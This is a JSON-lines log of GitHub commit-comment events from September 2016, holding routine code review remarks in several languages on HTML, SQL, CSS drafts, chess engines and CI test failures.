{"id":"4578268465","type":"CommitCommentEvent","actor":{"login":"HumanSprout"},"repo":{"name":"HumanSprout/udemynode"},"payload":{"comment":{"id":19065435,"position":null,"line":null,"path":null,"commit_id":"30d0220ba49eba9e98de82f78a1724b986f79ac3","created_at":"2016-09-17T16:51:32Z","updated_at":"2016-09-17T16:51:32Z","body":"bug already squashed apparently"}},"created_at":"2016-09-17T16:51:32Z"}
{"id":"4578268547","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065436,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:51:36Z","updated_at":"2016-09-17T16:51:36Z","body":"@LDVSOFT А с `NOT NULL`,  что не так?  чтобы значение всегда было определено, вроде нужно указать"}},"created_at":"2016-09-17T16:51:36Z"}
{"id":"4578268553","type":"CommitCommentEvent","actor":{"login":"MindOfThomas"},"repo":{"name":"MindOfThomas/counter"},"payload":{"comment":{"id":19065437,"position":null,"line":null,"path":null,"commit_id":"4dd4a8703f9b61607714c0bb2cd13c38ff5e4016","created_at":"2016-09-17T16:51:36Z","updated_at":"2016-09-17T16:51:36Z","body":"Progress bar changes to green at 100%"}},"created_at":"2016-09-17T16:51:36Z"}
{"id":"4578271334","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19065443,"position":null,"line":null,"path":null,"commit_id":"4a1b96ffdc229b7a19b90766536c1111424c65e9","created_at":"2016-09-17T16:53:25Z","updated_at":"2016-09-17T16:53:25Z","body":"![3](https://cloud.githubusercontent.com/assets/207850/18609677/011c6222-7d08-11e6-9c0a-46ccfb79965b.png)\r\n![3b](https://cloud.githubusercontent.com/assets/207850/18609676/01197bde-7d08-11e6-92b6-a938ac1b1518.png)\r\n"}},"created_at":"2016-09-17T16:53:25Z"}
{"id":"4578273463","type":"CommitCommentEvent","actor":{"login":"fre5h"},"repo":{"name":"ftrrtf/jwt"},"payload":{"comment":{"id":19065449,"position":28,"line":95,"path":"src/Serialization/Compact.php","commit_id":"fafb029be03f3abc5077903ff65caf695511f93a","created_at":"2016-09-17T16:54:53Z","updated_at":"2016-09-17T16:54:53Z","body":"Слово `may` в ексепшенах навряд чи доцільно використовувати. Там має бути або `should` або `must`."}},"created_at":"2016-09-17T16:54:53Z"}
{"id":"4578274081","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065450,"position":7,"line":7,"path":"00-HTML-CSS-basics/expenses.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:55:14Z","updated_at":"2016-09-17T16:55:14Z","body":"Please add `<caption>` and `scope` to make this table accessible."}},"created_at":"2016-09-17T16:55:14Z"}
{"id":"4578278213","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19065460,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T16:57:57Z","updated_at":"2016-09-17T16:57:57Z","body":"I can add tags and make tarballs already - if we don't have any things left to solve."}},"created_at":"2016-09-17T16:57:57Z"}
{"id":"4578278886","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19065463,"position":null,"line":null,"path":null,"commit_id":"d7da4a0176d7871a56c8d70a2af5e075373d7a10","created_at":"2016-09-17T16:58:23Z","updated_at":"2016-09-17T16:58:23Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35592/testReport/) for this commit**"}},"created_at":"2016-09-17T16:58:23Z"}
{"id":"4578278926","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19065465,"position":null,"line":null,"path":null,"commit_id":"727e84cce0b0aa2491ff4cba344de1c6fcb949ec","created_at":"2016-09-17T16:58:24Z","updated_at":"2016-09-17T16:58:24Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35590/testReport/) for this commit**"}},"created_at":"2016-09-17T16:58:24Z"}
{"id":"4578278934","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19065464,"position":null,"line":null,"path":null,"commit_id":"727e84cce0b0aa2491ff4cba344de1c6fcb949ec","created_at":"2016-09-17T16:58:24Z","updated_at":"2016-09-17T16:58:24Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35591/testReport/) for this commit**"}},"created_at":"2016-09-17T16:58:24Z"}
{"id":"4578278974","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19065466,"position":null,"line":null,"path":null,"commit_id":"727e84cce0b0aa2491ff4cba344de1c6fcb949ec","created_at":"2016-09-17T16:58:26Z","updated_at":"2016-09-17T16:58:26Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35589/testReport/) for this commit**"}},"created_at":"2016-09-17T16:58:26Z"}
{"id":"4578279734","type":"CommitCommentEvent","actor":{"login":"simpleuser1"},"repo":{"name":"simpleuser1/SpringBasic"},"payload":{"comment":{"id":19065468,"position":3,"line":3,"path":"README.md","commit_id":"1dd4f7604edb320646874b02ffa2cc54d5e0efd1","created_at":"2016-09-17T16:58:55Z","updated_at":"2016-09-17T16:58:55Z","body":"From Repo commit"}},"created_at":"2016-09-17T16:58:55Z"}
{"id":"4578279770","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19065469,"position":null,"line":null,"path":null,"commit_id":"727e84cce0b0aa2491ff4cba344de1c6fcb949ec","created_at":"2016-09-17T16:58:57Z","updated_at":"2016-09-17T16:58:57Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35602/testReport/) for this commit**"}},"created_at":"2016-09-17T16:58:57Z"}
{"id":"4578281054","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065475,"position":617,"line":5068,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T16:59:45Z","updated_at":"2016-09-17T16:59:45Z","body":"Done."}},"created_at":"2016-09-17T16:59:45Z"}
{"id":"4578281160","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065476,"position":7,"line":563,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T16:59:49Z","updated_at":"2016-09-17T16:59:49Z","body":"Done."}},"created_at":"2016-09-17T16:59:49Z"}
{"id":"4578281247","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065477,"position":36,"line":650,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T16:59:52Z","updated_at":"2016-09-17T16:59:52Z","body":"Done."}},"created_at":"2016-09-17T16:59:52Z"}
{"id":"4578281252","type":"CommitCommentEvent","actor":{"login":"JuanCrg90"},"repo":{"name":"ErickMtz/HTTP-Protocolo-de-Transferencia-de-Hipertexto-"},"payload":{"comment":{"id":19065478,"position":4,"line":57,"path":"README.md","commit_id":"e0bcadd592194ef3bd28b3eb8dc3f09c6144409b","created_at":"2016-09-17T16:59:52Z","updated_at":"2016-09-17T16:59:52Z","body":"Is this a Typo?"}},"created_at":"2016-09-17T16:59:52Z"}
{"id":"4578281456","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065479,"position":86,"line":712,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:00:00Z","updated_at":"2016-09-17T17:00:00Z","body":"Done."}},"created_at":"2016-09-17T17:00:00Z"}
{"id":"4578281593","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065481,"position":130,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:00:04Z","updated_at":"2016-09-17T17:00:04Z","body":"Done."}},"created_at":"2016-09-17T17:00:04Z"}
{"id":"4578281673","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065482,"position":143,"line":773,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:00:08Z","updated_at":"2016-09-17T17:00:08Z","body":"Done."}},"created_at":"2016-09-17T17:00:08Z"}
{"id":"4578281839","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065484,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:00:13Z","updated_at":"2016-09-17T17:00:13Z","body":"Done."}},"created_at":"2016-09-17T17:00:13Z"}
{"id":"4578282034","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065485,"position":195,"line":844,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:00:18Z","updated_at":"2016-09-17T17:00:18Z","body":"Done."}},"created_at":"2016-09-17T17:00:18Z"}
{"id":"4578283921","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065490,"position":197,"line":846,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:01:21Z","updated_at":"2016-09-17T17:01:21Z","body":"Done."}},"created_at":"2016-09-17T17:01:21Z"}
{"id":"4578284150","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065491,"position":216,"line":864,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:01:30Z","updated_at":"2016-09-17T17:01:30Z","body":"Done."}},"created_at":"2016-09-17T17:01:30Z"}
{"id":"4578284347","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065492,"position":347,"line":2534,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:01:39Z","updated_at":"2016-09-17T17:01:39Z","body":"Done."}},"created_at":"2016-09-17T17:01:39Z"}
{"id":"4578284469","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19065493,"position":4,"line":4,"path":"00-HTML-CSS-basics/ex 1/multimedia.html","commit_id":"8b40c51a8b21fa4c6ba329c9da122414048f9b04","created_at":"2016-09-17T17:01:44Z","updated_at":"2016-09-17T17:01:44Z","body":"Having more than one `<h1>` tag per page is not semantic. It should be only used as a main title. After that, you should use `<h2>` in instead."}},"created_at":"2016-09-17T17:01:44Z"}
{"id":"4578284569","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19065494,"position":451,"line":4419,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-17T17:01:49Z","updated_at":"2016-09-17T17:01:49Z","body":"Done."}},"created_at":"2016-09-17T17:01:49Z"}
{"id":"4578284740","type":"CommitCommentEvent","actor":{"login":"JakeDaBoss"},"repo":{"name":"JakeDaBoss/Prospector-2.1"},"payload":{"comment":{"id":19065495,"position":null,"line":null,"path":null,"commit_id":"6b428c98df0aeee729e8a19fb83de5de858c4b7d","created_at":"2016-09-17T17:01:56Z","updated_at":"2016-09-17T17:01:56Z","body":"https://i.imgur.com/x1myQrW.png This will happen."}},"created_at":"2016-09-17T17:01:56Z"}
{"id":"4578285467","type":"CommitCommentEvent","actor":{"login":"master3395"},"repo":{"name":"82Flex/WEIPDCRM"},"payload":{"comment":{"id":19065499,"position":null,"line":null,"path":null,"commit_id":"08437e7e82423b00752dbd9d3f2c5b37cdd463d4","created_at":"2016-09-17T17:02:23Z","updated_at":"2016-09-17T17:02:23Z","body":"What about making the google fonts work with http and https?"}},"created_at":"2016-09-17T17:02:23Z"}
{"id":"4578289875","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19065506,"position":null,"line":null,"path":null,"commit_id":"a531832fb145300f9e40f9e7da97103d8eb41b07","created_at":"2016-09-17T17:04:21Z","updated_at":"2016-09-17T17:04:21Z","body":"Nice, I'm curious!"}},"created_at":"2016-09-17T17:04:21Z"}
{"id":"4578292042","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19065515,"position":null,"line":null,"path":null,"commit_id":"0079074f9147f3b39cf544ad594ba60cb734e1c2","created_at":"2016-09-17T17:05:44Z","updated_at":"2016-09-17T17:05:44Z","body":"@lucabrivio Hi Luca, this was mentioned by Daniel Jose and seemed to be a small gain in Andscacs.\r\nI see you already submitted a test, good luck."}},"created_at":"2016-09-17T17:05:44Z"}
{"id":"4578294518","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19065523,"position":null,"line":null,"path":null,"commit_id":"0079074f9147f3b39cf544ad594ba60cb734e1c2","created_at":"2016-09-17T17:07:19Z","updated_at":"2016-09-17T17:07:19Z","body":"Hi @joergoster ! That's interesting! Thanks!"}},"created_at":"2016-09-17T17:07:19Z"}
{"id":"4578295933","type":"CommitCommentEvent","actor":{"login":"vpeter4"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19065526,"position":null,"line":null,"path":null,"commit_id":"2bd488fec9a0e8df6d9d63b470749b846d20a1b6","created_at":"2016-09-17T17:08:10Z","updated_at":"2016-09-17T17:08:10Z","body":"I found one DVB card (TBS-6220) to test with mini PCIe adapter to actually connect everything.\r\nImage with kernel 3.14 doesn't see PCIe bus. Should investigate why but atm don't have reason to do.\r\nBut image with kernel 4.4 see it: http://pastebin.com/kAstZGWk\r\nImage: http://vpeter.libreelec.tv/imx6-xbian-kernel-4.4/LibreELEC-imx6.arm-8.0-7.90.005.1-matrix.img.gz"}},"created_at":"2016-09-17T17:08:10Z"}
{"id":"4578296812","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":19065531,"position":5,"line":54,"path":"R/cut.integer.R","commit_id":"c971694cbde0ad0a17498767f0db8f9442e100c4","created_at":"2016-09-17T17:08:43Z","updated_at":"2016-09-17T17:08:43Z","body":"Yes we could consider something like this. I'm a little conflicted (as with the cleaning debate for `cfactor`), but there are probably some valid use cases where you'd want to allow for flexible coercion, and perhaps more importantly, providing a parameter facilitates documenting the functionality transparently."}},"created_at":"2016-09-17T17:08:43Z"}
{"id":"4578298635","type":"CommitCommentEvent","actor":{"login":"chergert"},"repo":{"name":"flatpak/flatpak"},"payload":{"comment":{"id":19065536,"position":6,"line":166,"path":"doc/flatpak-build-finish.xml","commit_id":"7de6a33087811298d7d3b9dd56dfc6cde6a0af71","created_at":"2016-09-17T17:09:51Z","updated_at":"2016-09-17T17:09:51Z","body":"Aha! Looks like that is the case. This fixes the manpage generation too."}},"created_at":"2016-09-17T17:09:51Z"}
{"id":"4578299298","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19065540,"position":7,"line":7,"path":"00-HTML-CSS-basics/ex 1/signup.html","commit_id":"8b40c51a8b21fa4c6ba329c9da122414048f9b04","created_at":"2016-09-17T17:10:15Z","updated_at":"2016-09-17T17:10:15Z","body":"It is not right to use `<p>` to wrap inputs, I know you did this to improve the form layout, but this will result an invalid markup. Try something else."}},"created_at":"2016-09-17T17:10:15Z"}
{"id":"4578299897","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19065541,"position":7,"line":6,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"6a5d9f4fbbae626a4eded9dadb9f1c043535e3f8","created_at":"2016-09-17T17:10:40Z","updated_at":"2016-09-17T17:10:40Z","body":"This is a bit dangerous, as \"Helizitätoperator\" (no \"Fugen-s\") will also be accepted I guess. But I don't know an easy solution, other than making the logic more and more complicated..."}},"created_at":"2016-09-17T17:10:40Z"}
{"id":"4578301761","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19065545,"position":11,"line":11,"path":"00-HTML-CSS-basics/ex 1/signup.html","commit_id":"8b40c51a8b21fa4c6ba329c9da122414048f9b04","created_at":"2016-09-17T17:11:51Z","updated_at":"2016-09-17T17:11:51Z","body":"The space before `</label>` is not needed, remove it."}},"created_at":"2016-09-17T17:11:51Z"}
{"id":"4578305557","type":"CommitCommentEvent","actor":{"login":"haoNoQ"},"repo":{"name":"k-wisniewski/clang"},"payload":{"comment":{"id":19065557,"position":75,"line":111,"path":"lib/StaticAnalyzer/Checkers/InfiniteRecursionChecker.cpp","commit_id":"81a449398ab6df57089876443e64f39953d8d88c","created_at":"2016-09-17T17:14:24Z","updated_at":"2016-09-17T17:14:24Z","body":"`return None;`"}},"created_at":"2016-09-17T17:14:24Z"}
{"id":"4578306436","type":"CommitCommentEvent","actor":{"login":"borismod"},"repo":{"name":"stack72/TeamCitySharp"},"payload":{"comment":{"id":19065565,"position":null,"line":null,"path":null,"commit_id":"0b32206d6f110f8901eb6360ee805a007028f5b2","created_at":"2016-09-17T17:15:01Z","updated_at":"2016-09-17T17:15:01Z","body":"It seems like a big and important contribution. However, I am afraid that the project was abandoned by its maintainers. You might want to checkout [FluentTc](http://github.com/QualiSystems/FluentTc) project, which was inspired by TemCitySharp."}},"created_at":"2016-09-17T17:15:01Z"}
{"id":"4578308804","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19065570,"position":32,"line":32,"path":"00-HTML-CSS-basics/ex 1/signup.html","commit_id":"8b40c51a8b21fa4c6ba329c9da122414048f9b04","created_at":"2016-09-17T17:16:30Z","updated_at":"2016-09-17T17:16:30Z","body":"You can use a `<label>` here. Try to avoid using `<br/>`. If you want the element fills the whole line change its display type."}},"created_at":"2016-09-17T17:16:30Z"}
{"id":"4578310125","type":"CommitCommentEvent","actor":{"login":"nado"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":19065574,"position":3,"line":988,"path":"src/scriptengine/scriptarray.cpp","commit_id":"f47ec883f6c487e4be1ef5fab2bf5c7faf8ab8cc","created_at":"2016-09-17T17:17:19Z","updated_at":"2016-09-17T17:17:19Z","body":"I don’t change tabs to spaces where I didnt change the code, as asked by others."}},"created_at":"2016-09-17T17:17:19Z"}
{"id":"4578311389","type":"CommitCommentEvent","actor":{"login":"est31"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19065576,"position":4,"line":2816,"path":"doc/lua_api.txt","commit_id":"60db149327a27eb85989c6153d46990d0780454e","created_at":"2016-09-17T17:18:04Z","updated_at":"2016-09-17T17:18:04Z","body":"Maybe add a convenience mode where you can pass a filename? I'm sure most people will want that instead of specifying a string, which will destroy any syntax highlighting."}},"created_at":"2016-09-17T17:18:04Z"}
{"id":"4578312510","type":"CommitCommentEvent","actor":{"login":"tTrilenko"},"repo":{"name":"NikolaVilkov/Plugin-add-tooltip"},"payload":{"comment":{"id":19065582,"position":18,"line":18,"path":"plugin has to add tooltip/index.html","commit_id":"004b99f578a5e225e12ef9b2b028da291b1fad24","created_at":"2016-09-17T17:18:47Z","updated_at":"2016-09-17T17:18:47Z","body":"мы не пишем скрипты в html"}},"created_at":"2016-09-17T17:18:47Z"}
{"id":"4578312621","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19065584,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-17T17:18:53Z","updated_at":"2016-09-17T17:18:53Z","body":"to_unix and to_gregorian are equally specific to one calendar. The only difference in that regard is the start of the epoch.\r\n\r\n> It would be nice to have an implementation that works on any calendar.\r\n\r\nWhy couldn't other calendars calculate Gregorian seconds and by extension to_unix?\r\n\r\nAdmittedly I care most about the Gregorian calendar because that is the de facto world standard. For implementations of other calendars, the Elixir structs can be used, but wouldn't people need to use other libraries for functionality anyway?\r\n\r\n> Another thing I realized is that this is doing a difference between two dates or two times. So maybe we should rather implement difference for all three of them with precision as argument?\r\n\r\nI'm not sure I understand this. Rather than what?"}},"created_at":"2016-09-17T17:18:53Z"}
{"id":"4578313630","type":"CommitCommentEvent","actor":{"login":"ivantran2290"},"repo":{"name":"hiennguyen161/SpendingManagement"},"payload":{"comment":{"id":19065589,"position":null,"line":null,"path":null,"commit_id":"c8e3b0cb7658f88b557e938bac7c8a40de5fb57a","created_at":"2016-09-17T17:19:33Z","updated_at":"2016-09-17T17:19:33Z","body":"test"}},"created_at":"2016-09-17T17:19:33Z"}
{"id":"4578313791","type":"CommitCommentEvent","actor":{"login":"ivantran2290"},"repo":{"name":"hiennguyen161/SpendingManagement"},"payload":{"comment":{"id":19065590,"position":null,"line":null,"path":null,"commit_id":"c8e3b0cb7658f88b557e938bac7c8a40de5fb57a","created_at":"2016-09-17T17:19:40Z","updated_at":"2016-09-17T17:19:40Z","body":"test"}},"created_at":"2016-09-17T17:19:40Z"}
{"id":"4578315672","type":"CommitCommentEvent","actor":{"login":"tTrilenko"},"repo":{"name":"NikolaVilkov/Plugin-add-tooltip"},"payload":{"comment":{"id":19065595,"position":26,"line":26,"path":"plugin has to add tooltip/tooltip.js","commit_id":"004b99f578a5e225e12ef9b2b028da291b1fad24","created_at":"2016-09-17T17:20:54Z","updated_at":"2016-09-17T17:20:54Z","body":"это можно сделать на css "}},"created_at":"2016-09-17T17:20:54Z"}
{"id":"4578316236","type":"CommitCommentEvent","actor":{"login":"tTrilenko"},"repo":{"name":"NikolaVilkov/Plugin-add-tooltip"},"payload":{"comment":{"id":19065597,"position":62,"line":62,"path":"plugin has to add tooltip/tooltip.js","commit_id":"004b99f578a5e225e12ef9b2b028da291b1fad24","created_at":"2016-09-17T17:21:14Z","updated_at":"2016-09-17T17:21:14Z","body":"таймаут чистим"}},"created_at":"2016-09-17T17:21:14Z"}
{"id":"4578316794","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19065601,"position":4,"line":2,"path":"00-HTML-CSS-basics/ex 1/expenses.html","commit_id":"cc8b0162beba1a6388a58eecb83fe331791ab4be","created_at":"2016-09-17T17:21:38Z","updated_at":"2016-09-17T17:21:38Z","body":"Add accessibility to the table."}},"created_at":"2016-09-17T17:21:38Z"}
{"id":"4578318200","type":"CommitCommentEvent","actor":{"login":"tTrilenko"},"repo":{"name":"NikolaVilkov/stickerboard"},"payload":{"comment":{"id":19065602,"position":71,"line":35,"path":"Stickerboard/mane_stick.js","commit_id":"946e83f7bfa3fc151336c5b948d19fe18979c6c5","created_at":"2016-09-17T17:22:37Z","updated_at":"2016-09-17T17:22:37Z","body":"тоже через addEventListener"}},"created_at":"2016-09-17T17:22:37Z"}
{"id":"4578318204","type":"CommitCommentEvent","actor":{"login":"yuxitian"},"repo":{"name":"OHDSI/CohortMethod"},"payload":{"comment":{"id":19065603,"position":null,"line":null,"path":null,"commit_id":"dfa1b3407b373db1882fe1ebb8d435dc09af9d6c","created_at":"2016-09-17T17:22:38Z","updated_at":"2016-09-17T17:22:38Z","body":"every stratum is given equal weight even if they have different numbers of people in them. did you intend this weighting method?"}},"created_at":"2016-09-17T17:22:38Z"}
{"id":"4578320669","type":"CommitCommentEvent","actor":{"login":"palvarez89"},"repo":{"name":"Mariocj89/EchaloASuerte"},"payload":{"comment":{"id":19065618,"position":5,"line":29,"path":"echaloasuerte/settings/test.py","commit_id":"bd806571403e4984f4c51f99b1af023ed83e6477","created_at":"2016-09-17T17:24:12Z","updated_at":"2016-09-17T17:24:12Z","body":"Import os"}},"created_at":"2016-09-17T17:24:12Z"}
{"id":"4578321565","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19065620,"position":null,"line":null,"path":null,"commit_id":"09ac05fc467471b8043ed5bbd77639d70d798afe","created_at":"2016-09-17T17:24:48Z","updated_at":"2016-09-17T17:24:48Z","body":"Initial commit.\r\nmoneroj"}},"created_at":"2016-09-17T17:24:48Z"}
{"id":"4578323708","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065631,"position":1,"line":1,"path":"00-html-css-basics/styles.css","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:26:14Z","updated_at":"2016-09-17T17:26:14Z","body":"This is fine for the purpose of this exercise, but remember to avoid using tags selectors in your styles. The only place where tag selectors belong is in css reset sheets (as normalize.css)."}},"created_at":"2016-09-17T17:26:14Z"}
{"id":"4578324824","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065638,"position":6,"line":6,"path":"00-html-css-basics/media.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:27:04Z","updated_at":"2016-09-17T17:27:04Z","body":"Having more than one <h1> tag per page is not semantic. It should be only used as a main title. After that, you should use <h2> in instead."}},"created_at":"2016-09-17T17:27:04Z"}
{"id":"4578324924","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"ropensci/stplanr"},"payload":{"comment":{"id":19065639,"position":null,"line":null,"path":null,"commit_id":"9422e7eea59ee96aecab1aefbbd848cfd5f0455e","created_at":"2016-09-17T17:27:08Z","updated_at":"2016-09-17T17:27:08Z","body":"Heads up @richardellison - just realised retrospectively that this caused #124. Apologies."}},"created_at":"2016-09-17T17:27:08Z"}
{"id":"4578326744","type":"CommitCommentEvent","actor":{"login":"cgorka"},"repo":{"name":"cgorka/CodeWars"},"payload":{"comment":{"id":19065645,"position":4,"line":50,"path":"CodeWarsTests/Extensions.cs","commit_id":"11faf129585e6c23eef93b02ca18cc48bb09edee","created_at":"2016-09-17T17:28:20Z","updated_at":"2016-09-17T17:28:20Z","body":"po co to banalne ?"}},"created_at":"2016-09-17T17:28:20Z"}
{"id":"4578326828","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065646,"position":5,"line":5,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T17:28:24Z","updated_at":"2016-09-17T17:28:24Z","body":"Зачем?"}},"created_at":"2016-09-17T17:28:24Z"}
{"id":"4578327376","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065648,"position":9,"line":9,"path":"00-html-css-basics/media.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:28:46Z","updated_at":"2016-09-17T17:28:46Z","body":"Although `<audio>` and `<video>` are currently supported by newest browsers, it is a good idea to add a text message advising the user just in case they were not supported by his browser."}},"created_at":"2016-09-17T17:28:46Z"}
{"id":"4578327661","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065650,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T17:29:00Z","updated_at":"2016-09-17T17:29:00Z","body":"Неа, наоборот!"}},"created_at":"2016-09-17T17:29:00Z"}
{"id":"4578328010","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19065651,"position":13,"line":568,"path":"core/src/main/java/org/jruby/Ruby.java","commit_id":"1cc0d6a94cb13c46f0bc35bfcca8c000ead622dc","created_at":"2016-09-17T17:29:13Z","updated_at":"2016-09-17T17:29:13Z","body":"Is this OK that the control flow possibly continues below or should there be a `return` here (to avoid doing a second parse etc)?\r\nMaybe something in the block above always throw a MainExitException?"}},"created_at":"2016-09-17T17:29:13Z"}
